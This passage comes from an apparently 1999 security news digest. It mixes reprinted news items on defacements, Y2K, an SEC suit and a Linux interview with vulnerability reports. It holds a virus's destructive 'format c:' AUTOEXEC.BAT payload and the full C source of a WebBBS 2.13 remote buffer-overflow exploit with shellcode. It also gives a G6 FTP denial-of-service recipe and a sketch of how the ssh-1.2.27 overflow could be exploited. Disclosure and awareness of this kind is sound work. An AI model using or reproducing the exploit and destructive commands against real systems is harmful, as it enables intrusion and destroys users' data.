UserName) and a message body of "This document is very Important and you've GOT to read this !!!". The first 50 listings from all available address books are selected as the recipient - the message is then sent with an attachment of the infected document. Lastly, the virus code creates the registry key. If this key does exist, the email propagation is not repeated. If the date is December 25th (any year), the virus runs a destructive payload to overwrite the existing C:\AUTOEXEC.BAT file with the following instructions: "@echo off" "@echo Vine...Vide...Vice...Moslem Power Never End..." "@echo Your Computer Have Just Been Terminated By -= CyberNET =- Virus !!!" "ctty nul" "format c: /autotest /q /u" Since the AUTOEXEC.BAT is not used on Windows NT, this payload is not applicable to that operating system. The next reboot of the computer will run the AUTOEXEC.BAT file causing an unconditional automated format of the hard drive. Also, a message box is displayed within Word97 with the following text: (C) 1999 - CyberNET Vine... Vide... Vice...Moslem Power Never End... You Dare Rise Against Me... The Human Era is Over, The CyberNET Era Has Come!!! [OK] After clicking on the OK dialogue box, a random number of randomly colored and random size and type objects fill the document as an overlay. Another virus which uses this overlay is the W97M/Pri virus. Indications Of Infection Macro warning if opening infected document, increase in size to global template. Messages on screen as mentioned above. Email propagation as mentioned above. Method Of Infection Opening infected documents will infect global template normal.dot. EXTRA Drivers VirusScan 4 with the 4.0.25 engine (and above) download here Dr. Solomon's AVTK 7.99 and above download here VirusScan 3 with the 3.2.2 engine download here Virus Information Discovery Date: 11/17/99 Type: Macro Risk Assessment: Medium On Watch Minimum DAT: 4054 (Avalable 12/2/99) Variants Several Aliases W97M/Melissa.w, Melissa.w, W97M/Prilissa, W97M/Pri.q, WM97/Melissa-ag, Melissa @HWA 46.0 GLOBALNET, CROATIAN ISP COMPROMISED ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 18th November 1999 on 3:13 pm CET Second largest Croatian ISP - Globalnet, was penetrated yesterday evening, and the main site was changed. Defacement and the link lead to Croatian web pages. Link: Monitor http://security.monitor.hr @HWA 47.0 SEC FILES CHARGES ~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 18th November 1999 on 3:05 pm CET A Denver-based software company misrepresented the capabilities of its software intended to fix Year 2000 computer problems and filed false earnings claims, according to a suit filed by the Securities and Exchange Commission against the firm and three of its executives. Link: News.com http://news.cnet.com/news/0-1009-200-1451624.html?tag=st.ne.1009.thed.1009-200-1451624 SEC files suit against Y2K toolmaker By Erich Luening Staff Writer, CNET News.com November 17, 1999, 6:55 a.m. PT A Denver-based software company misrepresented the capabilities of its software intended to fix Year 2000 computer problems and filed false earnings claims, according to a suit filed by the Securities and Exchange Commission against the firm and three of its executives. The suit, believed to be the first to charge that a software maker overstated the capabilities of a Year 2000 repair tool, alleges that from 1997 through 1999, Accelr8, its chief executive Thomas Geimer, president Harry Fleury and controller James Godkin made false claims about the utility of its Navig8 2000 software, Reuters reported. The executives are also accused of submitting false financial reports to the SEC during a one-year period that ended April 1999, according to the suit filed in federal court in Denver. The SEC's action seeks an injunction against future violations of the reporting and anti-fraud provision of the federal securities law. The SEC alleges Navig8 2000 was created to analyze computer programs only for the VAX/VMS computer system made by Digital Equipment, which was bought by Compaq Computer in 1998. The company claimed the software addressed Y2K issues for IBM and Microsoft products as well, according to the suit. The company's lawyers dispute the charges, saying Accelr8 has always properly represented the capabilities of its products and feels its accounting practices are appropriate. "We have a dispute with the SEC about the proper application of accounting standards," Simon Krauss, Accelr8's corporate counsel, said in a statement. "Our auditors and a former SEC accounting expert hired by us as a consultant have concurred in the reasonableness of our accounting decisions. Unfortunately, the SEC has the power to claim that anyone with whom they disagree has committed fraud, and has done so in this case." No trial date has been set. @HWA 48.0 G6 FTP SERVER v2.0 PROBLEMS ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 6:31 pm CET UssrLabs found a Local/Remote DoS Attack in G6 FTP Server v2.0 (beta 4/5). The buffer overflow is caused by a long user name with 2000 characters. G6FTP start to do infinites loops in the main program,and start eating ll memory and all computer resources. Link: UssrLabs http://www.ussrback.com/g6ftp/ beta 4/5 Vulnerability G6 FTP Server v2.0 PROBLEM UssrLabs found a Local/Remote DoS Attack in G6 FTP Server v2.0 (beta 4/5), The buffer overflow is caused by a long user name, 2000 characters.,The G6FTP start to do infinites loops in the main program,and start eating all memory and all computer resource CPU 100%, at the moment of no more memory, if this happened ALL System is down :( Example: [gimmemore@itsme]$ telnet example.com 21 Trying example.com... Connected to example.com. Escape character is '^]'. 220-G6 FTP Server v2.0 (beta 5) ready ... USER {buffer) Where buffer is 2000 characters. Vendor Status: Not Contacted Vendor Url: http://www.gene6.com/ Program Url: http://www.gene6.com/g6ftpd/download.html Credit: USSRLABS SOLUTION: Nothing yet. u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h @HWA 49.0 RED HAT SECURITY ADVISORY ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 6:22 pm CET The length of a path name was not checked on the removal of a directory. If a long enough directory name was created, the buffer holding the pathname would overflow, and the possibility exists that arbitrary code could be executed as the user the NFS server runs as (root). Exploiting this buffer overflow does require read/write access to a share on an affected server Link: Security Focus http://www.securityfocus.com @HWA 50.0 HPING ~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 6:00 pm CET Hping is a software to do TCP/IP stack auditing, to uncover firewall policy, to scan TCP port in a lot of different modes, to transfer files accross a firewall, test network performance, test of TOS is handled, etc. Link: Antirez http://www.kyuzz.org/antirez/hping2.html @HWA 51.0 RPM UPDATE HELPING UTILITY ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 6:17 pm CET Rhupdmgr is a script which sends an email to the sysadmins when a machine has fallen out of sync with the RedHat Updates. It works by checking a generated list of RPMs to be updated. Link: Packet Storm http://packetstorm.securify.com/linux/admin/rhupdmgr-0.4.tar.gz @HWA 52.0 WebBBS Ver2.13 Exploit / Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 5:56 pm CET At the initial authorization handling of WebBBS, If the long longin name or password has been received, this CGI overflows.. This overflow is used to execute any instructions which are included in the user name and password. Link: Packet Storm http://packetstorm.securify.com/9911-exploits/ex_webbbs.c /*============================================================================= WebBBS Ver2.13 Exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #define HEAD1 \ "POST /scripts/webbbs.exe HTTP/1.1\r\n"\ "Accept: application/msword, application/vnd.ms-excel, image/gif, "\ "image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n"\ "Accept-Language: ja\r\n"\ "Content-Type: application/x-www-form-urlencoded\r\n"\ "Accept-Encoding: gzip, deflate\r\n"\ "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)\r\n"\ "Host: 192.168.0.100\r\n"\ "Content-Length: 106\r\n"\ "Connection: Keep-Alive\r\n\r\n"\ "uid=&upw=" #define HEAD2 "&JOB=TOP&\r\nsub=+%83%8D%83O%83C%83%93+\r\n" #define HTTP_PORT 80 #define MAXBUF 80 #define RETADR 48 #define JMPESP_1 0xff #define JMPESP_2 0xe4 #define NOP 0x90 #define KERNEL_NAME "kernel32.dll" unsigned char jmp_code[100]={ 0x8B,0xDC,0x33,0xC0,0xB0,0x23,0xC1,0xE0, 0x10,0x66,0xB8,0x97,0xD9,0x2B,0xD8,0xFF, 0xE3,0x00 }; unsigned char exp_code[100]={ 0x33,0xC0,0x50,0x50,0xB0,0x12,0x50,0x66, 0xB8,0xFF,0xFF,0x50,0xB8,0xb8,0x58,0xf5, 0xbf,0xff,0xd0,0x50,0x50,0xB8,0x2c,0x23, 0xf5,0xbf,0xff,0xd0,0x00 }; main(int argc,char *argv[]) { SOCKET sock; SOCKADDR_IN addr; WSADATA wsa; WORD wVersionRequested; unsigned int i,kp,ip; static unsigned char buf[MAXBUF],buf2[1000],buf3[1000],*q; struct hostent *hs; MEMORY_BASIC_INFORMATION meminfo; if (argc<2){ printf("usage: %s VictimHost\n",argv[0]); exit(1); } if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){ printf("Can not find %s\n",KERNEL_NAME); exit(1); } VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION)); ip=0; for (i=0;i>8 )&0xff)==0 || ((ip>>16)&0xff)==0 || ((ip>>24)&0xff)==0) continue; q=(unsigned char *)ip; if (*q==JMPESP_1 && *(q+1)==JMPESP_2) break; } printf("RETADR : %x\n",ip); if (ip==0){ printf("Can not find codes which are used by exploit.\n"); exit(1); } wVersionRequested = MAKEWORD( 2, 0 ); if (WSAStartup(wVersionRequested , &wsa)!=0){ printf("Winsock Initialization failed.\n"); return -1; } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf("Can not create socket.\n"); return -1; } addr.sin_family = AF_INET; addr.sin_port = htons((u_short)HTTP_PORT); if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); return -1; } addr.sin_family = hs->h_addrtype; memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length); } if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){ printf("Can not connect to specified host.\n"); return -1; } memset(buf,NOP,MAXBUF); buf[MAXBUF]=0; strncpy(buf,exp_code,strlen(exp_code)); buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; strncpy(buf+RETADR+4,jmp_code,strlen(jmp_code)); send(sock,HEAD1,strlen(HEAD1),0); send(sock,buf,strlen(buf),0); send(sock,HEAD2,strlen(HEAD2),0); closesocket(sock); printf("Done.\n"); return FALSE; } @HWA 53.0 SENATE.GOV BITES THE DUST ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 5:14 pm CET One of the web sites on stat.gov was defaced earlier today. meetingout.senate.gov was hit, and the main page changed with: "rackmount. the 19-inch warrior. now available in 1u, 2u, and 4u flavors. shouts to [sSh]. good fellaz". Link: Attrition http://www.attrition.org/mirror/attrition/1999/11/17/meetingout.senate.gov/ @HWA 54.0 NEW NESSUS ~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 5:09 pm CET Nessus is a free, open-sourced and up-to-date remote security scanner for Linux, BSD, Solaris and some other systems. It is multithreaded, plugin-based, has a nice GTK interface and currently performs over 270 remote security checks. Link: The Nessus Project http://www.nessus.org/ @HWA 55.0 DELEGATE ~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 5:04 pm CET Delegate, a multiple-service proxy server contains several hundred buffer overflows and is horribly insecure in general. There is a demonstration exploit for just one remotely exploitable buffer overflow for delegate, compiled on linux. Link: Teso http://teso.scene.at/ @HWA 56.0 SSH PROBLEMS ~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 4:23 pm CET A remotely exploitable buffer overflow has been found in ssh-1.2.27. The problem is the length of the session key is not checked. Multiple platforms are vulnerable. Link: Packet Storm http://packetstorm.securify.com/9911-exploits/ssh-1.2.27.txt ------------------------------------------------------------------- Periodically, the moderator of of the vuln-dev mailing list will post summaries of issues discussed there to Bugtraq and possibly other relevant lists. This will usually happen when an issue has been resolved, or it appears that there will be no further discussion on vuln-dev. Each separate issue will be given it's own posting to facilitate referencing them separately, for discussion, forwarding, or appearance in vulnerability databases. To subscribe to vuln-dev, send an e-mail to listserv@securityfocus.com, with SUBSCRIBE VULN-DEV in the body of the message. A FAQ and archive can be found at www.securityfocus.com-->forums-->vuln-dev (click on these sections, the web pages are forms-based.) ------------------------------------------------------------------- There appears to be a serious vulnerability in ssh 1.2.27. I will let the folks who worked on this issue describe. There was brief discussion on vuln-dev on the politics of ssh 1 vs. ssh 2, etc... you may or may not want to play that out on Bugtraq. One of the key points of the SSH 1 vs. SSH 2 debate is regarding licensing. Basically, because of a less strict license on SSH 1, more folks are likely to be running that version. (This is all referring to the Datafellows implementation that everyone uses, rather than standards and protocols, I presume.) As usually, check the vuln-dev archives if you want the full story. This isn't necessarily a dead topic there yet, but this issue should get out there sooner rather than later. BB ------------------------------------------------------------------- To: Exploit-Dev Subject: ssh-1.2.27 remote buffer overflow - exploitable Date: Mon Nov 08 1999 16:48:53 Author: Frank Message-ID: <19991109014853.3239.qmail@securityfocus.com> This is submitted to the Freebsd bug tracking system, although there are doubtless other vendors who leave this package, despite the existence of the ssh-2.X. While Debian appears to be immune, I was able to crash my ssh daemon (much to my dismay), and there appears the potential to execute arbitrary code, as long as you encrypt it first... Here is the freebsd report.. it describes the method to crash a remote Ssh daemon (lets hope you ran sshd from your xinetd, etc). http://www.freebsd.org/cgi/query-pr.cgi?pr=14749 ------------------------------------------------------------------- To: Exploit-Dev Subject: Re: ssh-1.2.27 remote buffer overflow - exploitable Date: Mon Nov 08 1999 21:04:19 Author: Daniel Jacobowitz Message-ID: <19991109110419.A29502@drow.res.cmu.edu> Debian is immune for the (somewhat messy) reasons that they do not link ssh to rsaref, last time that I checked. ------------------------------------------------------------------- To: Exploit-Dev Subject: Re: ssh-1.2.27 remote buffer overflow - exploitable Date: Mon Nov 08 1999 21:24:17 Author: Daniel Jacobowitz Message-ID: <19991109112417.A30046@drow.res.cmu.edu> And here's a patch. Not tested, as I don't use the rsaref glue on any machine here. Ed: Patch can be found at: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-08 &msg=19991109112417.A30046@drow.res.cmu.edu ------------------------------------------------------------------- To: Exploit-Dev Subject: Re: ssh-1.2.27 remote buffer overflow - exploitable Date: Tue Nov 09 1999 04:42:16 Author: Jochen Bauer Message-ID: <19991109124216.A28812@luna.theo2.physik.uni-stuttgart.de> I've taken a closer look at the problem. Here's my analysis: In sshd.c, around line 1513 the client-generated session key, that has been encrypted with the server and host public keys, is received from the client as a multiple precision integer. /* Get the encrypted integer. */ mpz_init(&session_key_int); packet_get_mp_int(&session_key_int); The encrypted session key is then (around line 1525) passed to rsa_private_decrypt to do the first part of the decryption, which is either decryption using the server private key or decryption using the host private key, depending on which key has the larger modulus. rsa_private_decrypt(&session_key_int, &session_key_int, &sensitive_data.private_key); If RSAREF is used (i.e. RSAREF is defined in the code), the rsa_private_decrypt function in rsaglue.c (around line 162) looks like: void rsa_private_decrypt(MP_INT *output, MP_INT *input, RSAPrivateKey *key) { unsigned char input_data[MAX_RSA_MODULUS_LEN]; unsigned char output_data[MAX_RSA_MODULUS_LEN] unsigned int input_len, output_len, input_bits; [...] input_bits = mpz_sizeinbase(input, 2); input_len = (input_bits + 7) / 8; gmp_to_rsaref(input_data, input_len, input); [...] } The trouble spot is the fixed length buffer input_data[MAX_RSA_MODULUS_LEN]. A pointer to this buffer is passed to the conversion function gmp_to_rsaref along with a pointer to the encrypted session key and the length (input_len) of the encrypted session key, which may be greater than [MAX_RSA_MODULUS_LEN]. gmp_to_rsaref (located around line 79 of rsaglue.c) simply calls mp_linearize_msb_first(buf, len, value). void gmp_to_rsaref(unsigned char *buf, unsigned int len, MP_INT *value) { mp_linearize_msb_first(buf, len, value); } mp_linearize_msb_first is contained in mpaux.c around line 41. The function looks like: void mp_linearize_msb_first(unsigned char *buf, unsigned int len, MP_INT *value) { unsigned int i; MP_INT aux; mpz_init_set(&aux, value); for (i = len; i >= 4; i -= 4) <------- { unsigned long limb = mpz_get_ui(&aux); PUT_32BIT(buf + i - 4, limb); <------- mpz_div_2exp(&aux, &aux, 32); } [...] } There's the overflow! len is the length of the encrypted session key, while buf is a pointer to the fixed length buffer input_data[MAX_RSA_MODULUS_LEN] and no check wether len is greater than MAX_RSA_MODULUS_LEN is performed. The fix should be obvious! About the possible exploit: In this particular overflow, the encrypted, client generated session key has to be taken as the exploit buffer. I.e. the shellcode, NOPs and jump address has to sent to the server instead of the encrypted session key. To make that clear: The shellcode, NOPs and jump address don't have to be encrypted as they are taken as the ENCRYPTED session key. However, the data that is finally written into the buffer are the limbs of the multiple precision integer that session_key_int is assumed to be. The exploit buffer code therefore must be converted into a multiple precision integer, which upon extraction of the limbs into the buffer yields the correct exploit buffer code. The best way would probably be to start from the exploit buffer as it should finally be to overflow the target buffer and use the functions of the GNU multiple precision integer library to reverse the procedure happening to the encrypted session key in the sshd code step be step, leading to the exploit buffer that has to be sent instead of the encrypted session key. That may be difficult, be it think it's possible. @HWA 57.0 TORVALDS: COUPLE OF QUESTIONS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 18th November 1999 on 2:59 pm CET No one knows more about the Linux operating system than its creator, Linus Torvalds, and the founder of the largest Linux company, Bob Young of Red Hat. Michael Martinez tracked them down at Comdex and asked them few questions. Link: ABC http://abcnews.go.com/sections/tech/DailyNews/comdexqa991116.html Linux Q&A Linus Torvalds and Bob Young Answer Your Questions By Michael Martinez ABCNEWS.com L A S V E G A S — No one knows more about the Linux operating system than its creator, Linus Torvalds, and the founder of the largest Linux company, Bob Young of Red Hat. So I tracked them down at Comdex and asked them to answer your questions for you. Q U E S T I O N: How are you planning to prevent the “Big Guys” (IBM, Hewlett-Packard, Compaq/DEC, Sun) from adding their own features to Linux and causing incompatibilities among different vendors’ products? — Doug MacDonald A N S W E R: “I really don’t think there’s a problem there,” says Linux creator Torvalds. “A lot of these so-called big guys in particular have been burned by operating systems in the past. Just look at what happen to (IBM’s) OS/2. Nobody wants to touch operating systems. Everybody is so damned happy that somebody else is doing it! “Everyone that I’ve worked with has been very open with what they are doing with regard to Linux,” Torvalds says. “They aren’t really even trying to be very aggressive with the kernel [the core of the OS which Torvalds oversees, which is essentially the same in all forms of Linux]. The kernel is kind of scary to mess around with, and there just aren’t many developers willing to do it. We’ve seen Linux users grow from 1,000 to 10 million, but the number of people working on the kernel has grown from maybe 100 to 200. “And remember, the license prevents them from going too far. Everything they do has to be open source. Any competitor can then come along and grab that code and add it to their version of the system.” Q U E S T I O N: Linux seems well-suited for server use, where knowledge of the system is necessary to get the best out of it. But the newest influx of users, including myself, wants a new option for the desktop. So far, my experiences have been very disappointing. What can be done to move to a mainstream desktop platform that takes the guesswork out of installing an application? — Rick Tillery A N S W E R: “Your reader is obviously right because, fundamentally, nobody actually buys operating systems,” Red Hat founder Bob Young says. “People choose the applications they need, then choose the operating system. Microsoft clearly owns the desktop, because if you go to CompUSA, all the shelves have software for Windows. “We are very actively focused on this problem, and we are very happy with what folks like Corel are doing, bringing over their office (software) suite, with what Sun Microsystems has done with Star Office, with what Applixware is doing with their suite. We’re happy with what Netscape/AOL has been doing with the browser, because the browser was the killer desktop application in the 1990s.” Red Hat, the leading Linux seller, announced Monday that it will acquire software company Cygnus Solutions for $674 million. Young says this deal will also help. “Cygnus makes the kind of tools that developers need to create the applications people want,” Young says. “This could go a long way to help provide this total solution that people need to do the kind of things they really want to on the desktop.” @HWA 58.0 2K PREPARATIONS CAUSED PROBLEMS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 6:00 pm CET Y2K problems are starting before the actual rollover. Attempts by the City of Montreal to stave off a Y2K computer disaster are being blamed for causing the blaze that gutted a fire station. Link: Canoe http://www.canoe.ca/EdmontonNews/es.es-11-17-0047.html (Bleh! - 404: url not found) @HWA 59.0 IS MICROSOFT TO BLAME FOR Y2K? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 6:12 pm CET David O'Daniel Eddy wrote his opinion on Microsoft, with the actual quote that Microsoft could be called responsible for the Y2K problem. Do read his article entitled "A Knuckleball for Microsoft". Link: Westergaard http://www.wbn.com/y2ktimebomb/Techcorner/DE/de9946.htm A Knuckleball for Microsoft © 1999 By David O'Daniel Eddy November 17, 1999 Now that we have something really serious -- the Justice Department's ruling that Microsoft is a predatory monopoly -- to distract us, provide a wonderful amorphous target for endless editorial speculation, and generally contribute to landfills, I'd better get my two cents on the table. A year ago I expressed my reservations about how Microsoft's plunging ahead with Windows 2000 was an indication of their not paying serious attention to Y2K issues on the desktop. Although I recognize that Microsoft has indeed done tremendous good for the PC industry, they are at the same time far too full of their own power and success. They're so powerful now that they are effectively a captive of their own PR spin. If Chairman Bill says Y2K is primarily an old mainframe issue, then that's the way it is. End of discussion. But reality says something different. Let me share one of my favorite little factoids. My local business library has a directory of desktop (Windows, Unix, Macintosh, Commodore, Amiga, Tandy, etc.) software. It lists 3,056 vendors and 21,000 products. The majority of these commercial software products are what I would broadly classify as accounting packages -- accounts receivable, accounts payable, inventory management, general ledger, etc. The stuff that runs businesses. I don't care how you slice this, that's a lot of software. And we haven't even looked at the issue of how many different releases or versions of a product are available. Just because a vendor is at v10 of their product is not to say that all v1 versions have been retired in their customer base. Then I factor in knowledge from the outside world and my Y2K travels. The directory really tracks software packages offered only for broad market sale. It does not include the "package" written by a local CPA firm and installed (in a variety of configurations!) at 25 local client sites. The directory obviously doesn't include products that are no longer sold. It doesn't include the entirely custom software that has been written in the dozens of PC database/language products such as dBase II, dBase III, dBase IV, FoxPro, Paradox, 4D, Revelation, Alpha Four, FileMaker, and Clipper. In our fascination with the spectacular rise of Microsoft's market success we seem to forget that they make only software tools. They do not make core business accounting packages. They do not make business applications. That market is serviced by products from the likes of PeachTree, Great Plains Software, and thousands of other vendors. There are no dominant players here. In the world of desktop accounting packages, to have $50 million in revenues is to be large. The point I'm trying to drive home here is that our perceptions are upside down. Microsoft makes the base layer of operating system software and some of the specialized tools (database engines and language compilers) from which business applications are constructed. It's the teeny tiny (by comparison to the Microsoft behemoth) accounting package vendors like Great Plains Software ($85 million 1998 revenues) that use Microsoft hammers to build houses that people actually live in. As powerful, useful, and ubiquitous as MS Word and Excel have become, we have to remember that these are only the equivalent of a hammer or screwdriver. As universal as these products have become, it is simply not possible to run a business of any size or complexity with just a word processor and spreadsheet. To be a business, you need a chart of accounts, a general ledger, double entry bookkeeping, inventory control and much, much more. We've become so dazzled by Microsoft's ability to tell us it's time once again to upgrade to a more powerful operating system that we've lost sight of the fact that there are still tens of thousands of business applications in active use in both large and small enterprises, which are still running MS-DOS v5 on a 286 PC. There are huge segments of the marketplace that simply don't pay attention to the endless upgrade treadmill foisted on us by Microsoft and the media. And because Microsoft took an early hard line on Y2K -- "that's a mainframe problem" -- from the beginning, large numbers of people, assuming that a smart, super rich guy like Bill Gates knows what he's talking about, have simply gone back to sleep about the Y2K risks lurking inside their business operations. The tide of public opinion, represented in one aspect by the court's monopoly ruling, is beginning to shift against Microsoft. When core business applications running on defined-as-obsolete software (e.g., running on MS-DOS or Windows 3.1) goes belly up in the new year, there are going to be a lot of very angry folks. These are business people who are not at all interested in an esoteric technical discussion about the differences between operating system tools and business applications. After all, the cynics said all along that Y2K was just a scam and that Gates & Co. would ride in at the last moment with a $49.95 fix-it special. The evidence is that many small businesses do not perceive themselves to be at risk and are planning to cope with Y2K in a "fix-on-failure" mode. I believe that the building resentment against Microsoft's abusive tactics and undisputed monopoly powers will take an additional swing into negative territory come the new year, when core PC applications start going flakey. It certainly doesn't make sense to hold the tool builder responsible for the fact that your house collapsed, but the tool builder -- Microsoft in this instance -- has set themselves up for a mighty fall by turning a largely deaf ear to desktop Y2K risks. @HWA 60.0 $50 MILLIONS FOR Y2K CENTER ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 4:57 pm CET The government offered the first public glimpse Monday of its new $50 million Y2K nerve center, a highly computerized crisis room near the White House designed to track failures worldwide caused by the Year 2000 technology problem. Link: SJ Mercury http://www.sjmercury.com/svtech/news/breaking/merc/docs/081106.htm Government opens $50 million Y2K crisis center WASHINGTON (AP) -- The government offered the first public glimpse Monday of its new $50 million Y2K nerve center, a highly computerized crisis room near the White House designed to track failures worldwide caused by the Year 2000 technology problem. President Clinton's top Y2K adviser, John Koskinen, said the administration continues to believe there will be no major national problems, but said its Information Coordination Center will watch for ``some glitches'' anticipated during the New Year's date rollover. ``We hope that night will be really boring,'' said Koskinen, standing before a glass-empaneled room filled with high-end computers and digital maps showing global time zones. He called it ``the one place in the world with the most complete information.'' The government Monday also began cautioning against panic as people discover problems during the New Year's weekend, since some non-Y2K computer failures might simply coincide with the date rollover. ``We'll have failures from time to time whether you have a century date change or not,'' said Skip Patterson, who runs the Year 2000 program for Bell Atlantic Corp. Experts have previously warned of widespread phone outages if everyone tried to make a call around midnight -- what Koskinen described as ``Mother's Day by multiples.'' Nationwide almost every day, for example, some Internet sites crash, electricity temporarily fails or airline flights are delayed. In the earliest hours of Jan. 1, no one may know whether problems were caused by the Y2K bug or something else. ``The presumption is to blame all failures on Y2K that weekend,'' Koskinen said. About 10 percent of all credit transactions fail routinely because, for example, equipment breaks down or because consumers are overextended or forget their ATM password, said Paul Schmelzer, an executive vice president for Orlando, Fla.-based Star Systems Inc., which process about 2 billion financial transactions annually. He expects those same problems to show up Jan. 1. ``What consumers need to do if they go to an ATM on New Year's Day and find for whatever reason they can't get service, they should do what they do today -- go find a machine down the block or get cash back in the grocery store,'' Schmelzer said. ``Let's don't immediately assume we've got some serious Y2K problems.'' The government's Y2K crisis center is hardly a bunker -- it's on the 10th floor of a downtown building just blocks from the White House -- but it includes backup communications systems and entrance guards. Reports of any problems -- rated ``minor'' or ``significant'' -- will be shared with the White House and top government officials who will decide what to do. Information overseas will be fed by the State and Defense departments and industry groups, starting at roughly 6 a.m. EST Dec. 31, when midnight falls worldwide first in New Zealand. A flurry of activity is expected as midnight arrives across U.S. time zones, with more attention starting midday EST Jan. 2 as employees worldwide begin returning to their offices -- and turning on their computers -- for the first time since the date change. Koskinen predicted that any hacker attacks could be more easily detected during the date rollover because computers will be so closely monitored. A hacker calling himself ``Comdext0r'' vandalized a Web site at the Commerce Department late Sunday, warning people to ``run for your lives!'' and to ``hit your computer's power button and never, ever turn it on again'' because of the Y2K bug. A spokesman for the National Telecommunications and Information Administration, the government agency that handles high-tech policies, said its Internet site was altered about 9 p.m. Sunday but repaired about one hour later. Koskinen noted that recreational hackers typically vandalize Web sites to demonstrate some vulnerability that a computer administrator failed to fix. He said he was hopeful hackers wouldn't try such demonstrations during the weekend date change. ``We think they will understand this is not the best time to do that,'' Koskinen said. @HWA 61.0 EYES ON EXEC 2.32 ~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 4:44 pm CET Eyes on Exec 2.32 is a set of tools which you can use to build your own host based IDS. It watches for programs getting exec'd and logs information about it to a file. Combined with perl this can be extremely powerful. Requires linux kernel 2.2. Link: Packet Storm http://packetstorm.securify.com/UNIX/IDS/eoe232.tar.gz @HWA 62.0 CHECKPOINT AND LINUX ~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 4:37 pm CET Check Point Software Technologies' has created versions of its virtual private networks (VPN) and its security solution for the Linux platform to help Linux users keep prying eyes on the Internet at bay. Link: Checkpoint http://www.checkpoint.com @HWA 63.0 NOVELL SIMPLIFIES THINGS ~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 17th November 1999 on 4:33 pm CET Novell's chief executive Eric Schmidt yesterday announced an update to Novell's directory software that's intended to simplify the Web experience. A directory serves as a central repository for information concerning users, systems and network devices. Link: CNET http://news.cnet.com/news/0-1003-200-1451504.html?dtn.head Novell update intended to simplify Web logins, networks By Wylie Wong Staff Writer, CNET News.com November 16, 1999, 9:15 p.m. PT scomdex LAS VEGAS--Novell aims to untangle the Web, according to chief executive Eric Schmidt. Speaking at a trade show here, Schmidt today announced an update to Novell's directory software that's intended to simplify the Web experience. A directory serves as a central repository for information concerning users, systems and network devices. The constant pitfalls of surfing are all too familiar, Schmidt said. Consumers face the hassle of trying to remember login names and passwords, while businesses find it difficult to link their employees, suppliers and partners together and manage those relationships. Novell hopes networks will adopt its technology with the goal of making it easier to store and retrieve that information. Novell, once struggling in the shadow of Microsoft, is attempting to make a comeback with its directory software technology as a strategic centerpiece. The company believes its directory can become a central information database for software developers to rely on. Schmidt demonstrated how the technology works during his speech: With the update, the company's previously announced DigitalMe service allows Web portals, e-commerce firms and Internet service providers to let consumers control how their personal information is shared, used and maintained on the Net via a link to Novell's directory, or NDS. "It's the holy grail that the networking CIO [chief information officer] is trying to achieve," Schmidt said. In addition to the Internet-based directory update, called eDirectory, Novell released its NDS corporate edition for managing user information. The company also announced Net Publisher, which helps businesses manage the publication of content over the Web. The eDirectory--based on previously released NDS version 8 technology--supports the NetWare, Microsoft Windows NT and Sun Microsystems Solaris operating systems. In the future, the directory also will support Linux, Compaq Tru64 and Windows 2000, the company said. The release of eDirectory will lead to several product introductions over the next several months, according to Schmidt. Novell further announced two dozen partnerships, including AltaVista, BroadVision, Sun Microsystems, PeopleSoft and Oblix, which are either using the technology in their businesses are building the technology into their products. Novell wants to encourage corporations to rely on its directory, so that businesses come to use its central administrative database regardless of the operating system they are using. "It's key to manage the information of users, to authenticate users on what kinds of information they have access to, and to provide single administration," said Eric Golin, chief technology officer of Broadvision, during a press conference today. Novell executives are launching several promotions to market eDirectory. Independent software vendors can download a 100-user version of eDirectory and bundle it in its own applications. @HWA 64.0 RPC.NFSD PROBLEMS ~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 